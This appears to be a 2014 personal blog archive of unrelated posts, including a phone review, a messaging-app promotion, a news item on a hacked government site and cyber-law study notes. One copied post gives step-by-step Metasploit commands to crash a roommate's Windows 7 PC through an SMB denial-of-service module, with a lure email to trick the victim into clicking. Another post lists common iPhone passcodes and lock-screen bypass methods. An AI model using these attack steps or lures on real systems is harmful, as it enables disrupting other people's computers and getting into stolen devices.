Saturday 8 November 2014

Information

Guys .......One Community has Made a Joint-Venture With us .

It's a group formed by school students who helps needy people in every way possible.

Both Of us Has Decided to Take Steps To Help Needy People.

President:- Vikrant Sisodia

Treasure :- Eric Xavier

                                        
                                                  " Helping Hands"
                                  
                                                 

For More Information Contact Us Or Go to This Link
https://www.facebook.com/pages/Helping-Hands-Group/525305474263531



The Best Phablet Today

Our verdict
The Galaxy Note 4 is by far one of the best phablets that we have seen and combines high-end hardware with a feature rich UI. It also features some welcome changes in the design department and the Super AMOLED display just leaves us wanting for more. Samsung has yet again proved that it is the king among the phablet makers, and if you are looking for real-estate, this is where you should invest.

Samsung has be credited for bringing the phablet category into the market with its Galaxy Note series. Creating a bridge between traditional sized smartphones and tablets, the Note series has always been all about performance along with large real estate. The Note 4 is definitely an iconic phablet and probably the best phablet we have ever seen. But how does it perform in the real world? Here is our review...
SPECIFICATIONS
Display: 5.7 inches Super AMOLED, 2560x1440 resolution with Gorilla Glass 3 (515ppi)
Battery: 3220mAh, Fast battery charging: 60% in 30 min (Quick Charge 2.0)
Storage: 32GB
Camera: 16MP rear with flash and OIS, 3MP front with 1440p video
SoC: Qualcomm Snapdragon 805
CPU: Quad-core 2.7 GHz
GPU: Adreno 420
RAM: 3GB
Operating system: Android 4.4.4 with TouchWiz UX
Connectivity: 4G, Wi-Fi, Bluetooth, USB with OTG, IR Blaster port
BODY AND DESIGN
While Samsung is known and ridiculed for its plastic smartphones, the Note 4 is one of the first few devices from the Korean giant that uses metal. Before you get jumping, let us clarify that only the chassis/frame of the phablet is metal just like the Galaxy Alpha. The front is all glass and at the back, the removable back panel is again flimsy plastic with a faux-leather finish.


The front has the 5.7-inch Super AMOLED panel with a 2K resolution and 515 ppi pixel density, which looks absolutely brilliant. The colours are really vivid and the sharpness on the display is unmatched. Since it's an AMOLED display, the contrast is great and blacks looks deep. Samsung proves yet again that Super AMOLED is THE display to have on a smartphone. Underneath the display we again have two capacitive buttons and a hardware home key which has the integrated fingerprint scanner. Above the display there are your usual sensors, the earpiece, an LED notification light and the 3.7MP front camera. 


The metal frame is a great addition and gives the phablet a robust feel. The frame however has some curves and bends like on the top there is a slight curve to accommodate the 3.5mm audio jack. All in all the Note 4, with its metal frame, is definitely a premium phablet. 
The back does feature the old flimsy plastic cover, but thankfully it doesn’t lower down points in the design department. It blends in well and even offers a decent amount of grip. The back also has the loudspeaker, the 16MP camera, the LED flash and the heart rate monitor just next to it. Underneath the back panel you will find the 3220mAH battery, and two slots, one for your microSIM card and one for microSD card.
Of course you get the S-Pen which fits nicely into a slot at the bottom of the phablet. The S-Pen has a plastic finish with a single button which is slightly difficult to use. Also, the tip of the S-Pen wears out, but Samsung has got you covered by providing 5 extra tips in the box.
At first glance, the Note 4 seems to look like its predecessor, however it does feature some really good upgrades. The metal frame is an excellent choice, adding OIS to the camera improves the quality and the 2K Super AMOLED panel is just a delight. 

UI AND PERFORMANCE
The Note 4 runs on Android 4.4.4 KitKat out of the box with Samsung TouchWiz UX layer on top. This is quite similar to the one seen on the Galaxy S5 and other recent Galaxy products. TouchWiz has matured a lot over the years and Samsung has finally done it right. Previous versions of TouchWiz were not good with memory management and response. But the latest version of TouchWiz works like a charm, and is almost our favourite UI for Android. 
Thankfully Samsung has not loaded a lot of bloatware but has included its own app store, Galaxy Essentials, and Galaxy Gifts from where you can download apps as per your requirement. Samsung has also been very generous and is offering a vast list of free apps and app subscriptions with the Note 4. Some of the notable gifts include a free office editor app, one book per month free from Kindle, free photo prints worth Rs. 1000 from ZoomIn and loads more. My Magazine, which is a Flipboard based app, sits on the left of your first homescreen and brings you various news articles from various categories. 
You also get Samsung’s well known apps like S-Note and S-Health apps, the former providing you tools to scribble with the S-Pen and the latter providing some interesting health based trackers and features. Blocking mode and private mode are present and there a number of other customisations that you can use to personalize your experience. The Note 4 also brings in a brand new resizing feature which lets you resize any running app, making one hand operations easy on the phablet.The S-Pen brings in the true potential of the device as it enables you to not only draw or scribble stuff, but it also lets you cut/copy anything on your display and you can send it straight away. The S-Pen also lets you control your entire phone and also provides air gestures which essentially feels like a cursor.
The UI is silky smooth and we didn't notice any issues with the overall usage experience. Multitasking is managed well and even memory management works in order. The phablet is truly a powerhouse, handling everything thrown at it. Thanks to the Snapdragon 805 SoC and 3GB of RAM, the Note 4 is definitely one of the most powerful Android devices that you can buy.
High end games like Real Racing 3, Injustice: Gods Among Us, Asphalt 8: Airborne work flawlessly with no signs of frame drop. Playing movies, especially 1080p and 1440p is a piece of cake for the Note 4. In the benchmark tests, the Note 4 came out with flying colours as it scored the highest in almost all the tests. Here are the benchmark scores:
The battery performance is quite impressive as the large 3220mAh battery gives about one and half days of regular use. You get a power saving mode which restricts background data and performance and has a greyscale mode which applies a gray theme on the device. There is also Samsung’s newest ultra power saving mode which turns the display black and white and allows you to enable only a few functions like phone calls and text messages. On extensive use, without any power saving modes enabled, we got almost a full day's charge.
CAMERA
The new 16MP camera with OIS (Optical Image Stabilization) is something really worth mentioning. The OIS improves a lot in terms of sharpness and focusing as well. The camera is accurate, focusing is fast and there is zero shutter delay. The auto-white balance is not bad but it could see some improvement as the tones somehow don't seem very accurate. Colour reproduction is controlled and even saturation seems good. The camera app is intuitive and comes with various modes, filters and settings to tinker with. 
Low light performance is commendable although some pictures turned out to be noisy when compared to the iPhone 6 or the Xperia Z3. Check out some camera samples below:Video recording is smooth and videos come out excellent, especially 4K. Audio recording is also crisp thanks to the multiple mics.

CONCLUSION
Samsung was once criticised for going overboard with large screens, but today, the market is following the trend. The Galaxy Note 4 is yet again an excellent product from Samsung and it also reclaims the title of the best phablet around. The Note 4 is all about about great performance and productivity and the new design just makes it even better. If you are looking for a phablet, this is the one you should buy.

Friday 7 November 2014

World Fastest Secure Messaging app Working on all Platforms

Telegram
A Secure and Great Messaging App



Private
Telegram messages are heavily encrypted and can self-destruct.
Cloud-Based
Telegram lets you access your messages from multiple devices.
Fast
Telegram delivers messages faster than any other application.
Distributed
Telegram servers are spread worldwide for security and speed.
Open
Telegram has an open API and protocol free for everyone.
Free
Telegram is free forever. No ads. No subscription fees.
Secure
Telegram keeps your messages safe from hacker attacks.
Powerful
Telegram has no limits on the size of your media and chats.
                                                                                       Sent by :-Telegram 

Sunday 12 October 2014

Hack Like a Pro: How to Crash Your Roommate's Windows 7 PC with a Link

Although these operating systems were first released, in some cases, almost 10 years ago, they are still in wide use. I have done consulting to many large corporations and institutions and am always surprised to see Windows XP systems still being used. On the other, I'm never surprised to see Windows Server 2003, as server operating systems get upgraded much less often.
Operating system hacks can be fun, especially when they come at the expense of that software behemoth Microsoft, but they are becoming increasingly rare as Microsoft pays more attention to security. That is one of the reasons that more and more attacks are centered upon the client-side application software instead of the OS.

Crashing Your Roommate's Windows 7 Computer

Before we move on to client-side application hacks, I want to do at least one more operating system hack. Vulnerabilities still exist in the new operating systems, but they are becoming rarer and rarer. With so many vulnerabilities in client-side applications, why would you want to spend a lot of time on the OS?
In this hack, we will take advantage of a flaw in Windows 7 and Windows Server 2008 operating systems that will create an infinite loop and crash the system. Although this isn't nearly as much fun as owning the system, it can be very destructive to an institution that relies upon this system to run their organization.
Enough talk, let's get started. Fire up your Metasploit on Back Track 5 and let's hack! If you're new to Metasploit, check out my article on getting started with it, as well as some of the past hacks.

Step 1: A Little Background Material

Remember that Metasploit has six types of modules, exploits, payloads, auxiliary, encoders, NOPs and post. In this hack, we will use an auxiliary module to attack the Windows 7 or Windows Server 2008 system's SMB.
msf> use auxiliary/dos/windows/smb/ms10_negotiate_response_loop

Step 2: Show Options

Now that we have selected our module, let's look at our options:
msf> auxiliary(ms10_negotiate_response_loop) show options
As we can see in the screenshot below, the only option we need to set is SVRHOST, which is our—the attacker's—system. In my case, it is 192.168.1.100. Yours may be different; check your IP address by typing ifconfig in a terminal.

Step 3: Set SVRHOST

Next, set your SVRHOST by typing:
msf > auxiliary(ms10_negotiate_response_loop) set SVRHOST 192.168.1.100

Step 4: Run

In the last step, we run the auxiliary module and once the module executes, it generates a shared folder link which you can send to the target machine. In this case, the link is \\192.168.1.100\Shared\Anything.
msf > auxiliary(ms10_negotiate_response_loop) run

Step 5: Making an Attractive Link

Metasploit then starts the malicious SMB service and when the target clicks on the link, the target system will begin to run an infinite loop, freeze, and crash.
To make the link look safe and more inviting, we might try crafting a webpage and attaching this link to it. Sending this link with an email that says something like "Hey, check out this sick video!" When the victim clicks on the link to view the "video", their system crashes.
In my next few hacks, we will start looking at attacking the many vulnerable client-side applications. Happy hacking!

"This Post is Copied For Study Purpose Only"

How Thieves Unlock Passcodes on Stolen iPhones (And How to Protect Yourself Against It)


Back in 2010, iOS developer Daniel Amitay developed a camera security app for iPhones that used an unlock screen almost identical to that of the iPhone.
The app was removed in mid-2011 (though, it eventually reappeared in early-2013, still available in the iOS App Store today), and before its initial demise, Amitay recorded the passwords anonymously that users typed in, and these were the results:
Image via Naked Security
These ten iPhone passcodes make up 15% of the 200,000 passcodes that his application recorded. The most popular code was "1234", which almost 9,000 people used. The rest of the codes are either very simple ("0000"), create a pattern ("2580"), or in the case of "5683", make up a word (LOVE).
These results are staggering, because according to this study, these ten codes are used by 1 out of every 7 iPhone users. Merely attempting these 10 passcodes gives you a pretty high chance of getting into someone's iPhone, even in newer iOS 7 devices.

#1. Using Brute Force to Bypass the iPhone Lock Screen

Aside from the 10 common passcodes above, your chances can exponentially increase if you know the owner of the iPhone well.
Many people use 4-digit pins that they're familiar with: birthdays, anniversaries, addresses, the last 4 of their social security numbers, and even the last 4 digits of their own phone number. iPhone users unlock their cell phones dozens of times a day, making a simple and memorable passcode beneficial.
Add to that oily finger smudges on the screen and there's a pretty good chance you'll get passed the lock screen security.
You have 6 tries to access the phone before you'll see the "disabled" warning, and then a few more before the phone is completely disable, so that gives plenty of chances for a good brute-forcer to gain access.
Even if you see the disabled screen, you still can hack into it. Scroll down to the Completely Resetting the iPhone with iTunes section for more info.

Protecting Yourself from Brute-Forcers

Much like any PIN (e.g. debit cards), you need to make it hard to guess by thieves.
  • Don't choose any of the ten passcodes listed above.
  • Don't use any important dates or any other numbers that can be linked back to you.
  • Steer away from passcodes that make shapes, like "1397" or "7139" (a square).
  • Instead of an easy 4-digit number, choose an alphanumeric code. Go toSettings -> Passcode and enter in your current PIN. Then disable Simple Passcode and set an alphanumeric passcode.
For help coming up with better passwords and codes, check out one of the many guides over on Tech Pr0nPower Byte (the precursor to Null Byte), orInterNoobs.

#2. Using Siri to Bypass the iPhone Lock Screen

You can use Siri to bypass any code on the iPhone 4S, 5, 5C, or 5S (if Touch ID is disable), but only to a certain extent, and only if the user has allowed Siri access when the phone is locked
If so, you can just press down on the Home button and ask Siri to make a phone call, send a text, and look through notes. Simple stuff. You can't use Siri for things like looking through email, contacts, or the internet.

Protecting Yourself from Siri's Flaws

You can protect yourself from this by deactivating Siri while the phone is locked. Do this by going to Settings -> Passcode and disabling Siri from the lock screen.

#3. Completely Resetting the iPhone with iTunes

Resetting your iPhone can bypass the passcode, but will delete everything on the phone. This can come in handy if you forget your passcode and have everything backed up on your iTunes. So, if you get a message like this when connecting the device to iTunes...
You'll need to restore your iPhone back to factory settings:
  1. Turn off your iPhone.
  2. Press and hold the Home button, and while holding the Home button in, hurry up and connect your iPhone to your computer using the USB cord.
  3. Continuing holding the Home button until the "Connect to iTunes" screen pops up.
  4. iTunes will give you the recovery mode alert.
  5. Click "OK" and restore the device.
This will take off the passcode, but will delete everything on the phone. Make sure to back up your iPhone at least once beforehand, or it will wipe to factory settings.

Protecting Yourself from Clever iTunes Restorers

It's tough to protect yourself from a hard reset, especially if your phone is stolen. What you can do is to make sure that Find My iPhone is turned on. That way you cannot only track where the iPhone is, but also remotely delete all the information before someone has a chance to bypass the passcode, granted they don't just turn the device off and sell it for parts.

#4. Tricking iCloud with a Fake Server

An anonymous hacker by the name of AquaXetine found an exploit in Apple's iCloud system that lets anyone unlock a lost or stolen iPhone running iOS 7 or above, and Apple has yet to fix it.
This hack, available at the doulCi website (iCloud (almost) spelled backwards), appears to change your DNS for the connection to iCloud so their server can intercept the Activation Lock request, and then responds with the proper message to unlock the device.
Six iPhones that were hacked using the doulCi technique.
Image by esonglance/Twitter
So far, the hackers claim that over 15,000 devices have been unlocked using this technique.

Protecting Yourself from doulCi

Unfortunately, there's not much you can do here. We just have to wait for Apple to fix this insane oversight, and hope that the kill-switch legislationgets approved nationwide; if the device is essentially destroyed, then no one will want to steal it.

#5. Using Passcode-Hacking Apps

You can unlock an older iPhone using redsn0w, which also jailbreaks the device without deleting anything. This article has a video that shows how to install redsn0w on any iPhone still using iOS 5, while this one will show you how to do it on iOS 6 devices. It bypasses the code and doesn't delete any of the information stored on the iPhone. This could potentially also work withthe evasi0n jailbreak for iOS 7 devices, as well.
You can also use a program called Gecko iPhone Kit (for iOS 5), which can be downloaded here, but most devices are using at least iOS 6 by now. This will actually give you the code and doesn't jailbreak or delete anything from the iPhone. Below is a video tutorial of this process.
https://www.youtube.com/watch?feature=player_embedded&v=wY7Sc7e0sGI

Protecting Yourself from Password-Hacking Apps

Again, not much you can do here. If it works for them, awesome, because it was about time you updated to a new iPhone anyway.
Have you found another way to gain access to the lock screen on your iPhone? Let us know.

OFFICIAL WEBSITE OF MAHARASTRA GOVERNMENT HACKED:-Case

MUMBAI, 20 September 2007 — IT experts were trying yesterday to restore the official website of the government of Maharashtra, which was hacked in the early hours of Tuesday.
Rakesh Maria, joint commissioner of police, said that the state’s IT officials lodged a formal complaint with the Cyber Crime Branch police on Tuesday. He added that the hackers would be tracked down. Yesterday the website, http://www.maharashtragovernment.in, remained blocked.
Deputy Chief Minister and Home Minister R.R. Patil confirmed that the Maharashtra government website had been hacked. He added that the state government would seek the help of IT and the Cyber Crime Branch to investigate the hacking.
“We have taken a serious view of this hacking, and if need be the government would even go further and seek the help of private IT experts. Discussions are in progress between the officials of the IT Department and experts,” Patil added.
The state government website contains detailed information about government departments, circulars, reports, and several other topics. IT experts working on restoring the website told Arab News that they fear that the hackers may have destroyed all of the website’s contents.
According to sources, the hackers may be from Washington. IT experts said that the hackers had identified themselves as “Hackers Cool Al-Jazeera” and claimed they were based in Saudi Arabia. They added that this might be a red herring to throw investigators off their trail.
According to a senior official from the state government’s IT department, the official website has been affected by viruses on several occasions in the past, but was never hacked. The official added that the website had no firewall.

Wednesday 8 October 2014

Cyber Law Introduction
Distributed DOS
A distributed denial of service (DoS) attack is accomplished by using the Internet to break into computers and using them to attack a network.
Hundreds or thousands of computer systems across the Internet can be turned into “zombies” and used to attack another system or website.
Types of DOS
There are three basic types of attack:
a. Consumption of scarce, limited, or non-renewable resources like NW bandwith, RAM, CPU time. Even power, cool air, or water can affect.
b. Destruction or Alteration of Configuration Information
c. Physical Destruction or Alteration of Network Components
e. Pornography:-
The literal mining of the term 'Pornography' is “describing or showing sexual acts in order to cause sexual excitement through books, films, etc.”
This would include pornographic websites; pornographic material produced using computers and use of internet to download and transmit pornographic videos, pictures, photos, writings etc.
Adult entertainment is largest industry on internet.There are more than 420 million individual pornographic webpages today.
Research shows that 50% of the web-sites containing potentially illegal contents relating to child abuse were ‘Pay-Per-View’. This indicates that abusive images of children over Internet have been highly commercialized.
Pornography delivered over mobile phones is now a burgeoning business, “driven by the increase in sophisticated services that deliver video clips and streaming video, in addition to text and images.”
Effects of Pornography
Research has shown that pornography and its messages are involved in shaping attitudes and encouraging behavior that can harm individual users and their families.
Pornography is often viewed in secret, which creates deception within marriages that can lead to divorce in some cases.
In addition, pornography promotes the allure of adultery, prostitution and unreal expectations that can result in dangerous promiscuous behavior.
Some of the common, but false messages sent by sexualized culture.
Sex with anyone, under any circumstances, any way it is desired, is beneficial and does not have negative consequences.
Women have one value - to meet the sexual demands of men.
Marriage and children are obstacles to sexual fulfillment.
Everyone is involved in promiscuous sexual activity, infidelity and premarital sex.
Pornography Addiction
Dr. Victor Cline, an expert on Sexual Addiction, found that there is a four-step progression among many who consume pornography.
1.Addiction: Pornography provides a powerful sexual stimulant or aphrodisiac effect, followed by sexual release, most often through
masturbation.
2.Escalation: Over time addicts require more explicit and deviant material to meet their sexual "needs."
3.Desensitization: What was first perceived as gross, shocking and disturbing, in time becomes common and acceptable.
4.Acting out sexually: There is an increasing tendency to act out behaviors viewed in pornography.
g. Forgery:-
Counterfeit currency notes, postage and revenue stamps, mark sheets etc can be forged using sophisticated computers, printers and scanners.
Also impersonate another person is considered forgery.
h. IPR Violations:-
These include software piracy, copyright infringement, trademarks violations, theft of computer source code, patent violations. etc.
Cyber Squatting- Domain names are also trademarks and protected by ICANN’s domain dispute resolution policy and also under trademark laws.
Cyber Squatters registers domain name identical to popular service provider’s domain so as to attract their users and get benefit from it.
i. Cyber Terrorism:-
Targeted attacks on military installations, power plants, air traffic control, banks, trail traffic control, telecommunication networks are the most likely targets. Others like police, medical, fire and rescue systems etc.
Cyberterrorism is an attractive option for modern terrorists for several reasons.
1.It is cheaper than traditional terrorist methods.
2.Cyberterrorism is more anonymous than traditional terrorist methods.
3.The variety and number of targets are enormous.
4.Cyberterrorism can be conducted remotely, a feature that isespecially appealing to terrorists.
5.Cyberterrorism has the potential to affect directly a larger number of people.
j. Banking/Credit card Related crimes:-
In the corporate world, Internet hackers are continually looking for opportunities to compromise a company’s security in order to gain access to confidential banking and financial information.
Use of stolen card information or fake credit/debit cards are common.
Bank employee can grab money using programs to deduce small amount of money from all customer accounts and adding it to own account also called as salami.
k. E-commerce/ Investment Frauds:-
Sales and Investment frauds. An offering that uses false or fraudulent claims to solicit investments or loans, or that provides for the purchase, use, or trade of forged or counterfeit securities.
Merchandise or services that were purchased or contracted by individuals online are never delivered.
The fraud attributable to the misrepresentation of a product advertised for sale through an Internet auction site or the non-delivery of products purchased through an Internet auction site.
Investors are enticed to invest in this fraudulent scheme by the promises of abnormally high profits.
l. Sale of illegal articles:-
This would include trade of narcotics, weapons and wildlife etc., by posting information on websites, auction websites, and bulletin boards or simply by using email communication.
Research shows that number of people employed in this criminal area. Daily peoples receiving so many emails with offer of banned or illegal products for sale.
m. Online gambling:-
There are millions of websites hosted on servers abroad, that offer online gambling. In fact, it is believed that many of these websites are actually fronts for money laundering.
n. Defamation: -
Defamation can be understood as the intentional infringement of another person's right to his good name.
Cyber Defamation occurs when defamation takes place with the help of computers and / or the Internet. E.g. someone publishes defamatory matter about someone on a website or sends e-mails containing defamatory information to all of that person's friends. Information posted to a bulletin board can be accessed by anyone. This means that anyone can place
Cyber defamation is also called as Cyber smearing.

Cyber Stacking:-
Cyber stalking involves following a persons movements across the Internet by posting messages (sometimes threatening) on the bulletin boards frequented by the victim, entering the chat-rooms frequented by the victim, constantly bombarding the victim with emails etc.
In general, the harasser intends to cause emotional distress and has no legitimate purpose to his communications.
p. Pedophiles:-
Also there are persons who intentionally prey upon children. Specially with a teen they will let the teen know that fully understand the feelings towards adult and in particular teen parents.
They earns teens trust and gradually seduce them into sexual or indecent acts.
Pedophiles lure the children by distributing pornographic material, then they try to meet them for sex or to take their nude photographs including their engagement in sexual positions.
q. Identity Theft :- 

Identity theft is the fastest growing crime in countries like America.
Identity theft occurs when someone appropriates another's personal information without their knowledge to commit theft or fraud.
Identity theft is a vehicle for perpetrating other types of fraud schemes.
r. Data diddling:-
Data diddling involves changing data prior or during input into a computer.
In other words, information is changed from the way it should be entered by a person typing in the data, a virus that changes data, the programmer of the database or application, or anyone else involved in the process of having information stored in a computer file.
It also include automatic changing the financial information for some time before processing and then restoring original information.
s. Theft of Internet Hours:-
Unauthorized use of Internet hours paid for by another person.
By gaining access to an organisation's telephone switchboard (PBX) individuals or criminal organizations can obtain access to dial-in/dial-out circuits and then make their own calls or sell call time to third parties.
Additional forms of service theft include capturing 'calling card' details and on-selling calls charged to the calling card account, and counterfeiting or illicit reprogramming of stored value telephone cards.
t. Theft of computer system (Hardware):-
This type of offence involves the theft of a computer, some part(s) of a computer or a peripheral attached to the computer.
u. Physically damaging a computer system:-
Physically damaging a computer or its peripheralseither by shock, fire or excess electric supply etc.
v. Breach of Privacy and Confidentiality
Privacy
Privacy refers to the right of an individual/s to determine when, how and to what extent his or her personal data will be shared with others.
Breach of privacy means unauthorized use or distribution or disclosure of personal information like medical records, sexual preferences, financial status etc.
Confidentiality
It means non disclosure of information to unauthorized or unwanted persons.
In addition to Personal information some other type of information which useful for business and leakage of such information to other persons may cause damage to business or person, such information should be protected.
Generally for protecting secrecy of such information, parties while sharing information forms an agreement about he procedure of handling of information and to not to disclose such information to third parties or use it in such a way that it will be disclosed to third parties.
Many times party or their employees leak such valuable information for monitory gains and causes breach of contract of confidentiality.
Special techniques such as Social Engineering are commonly used to obtain confidential information.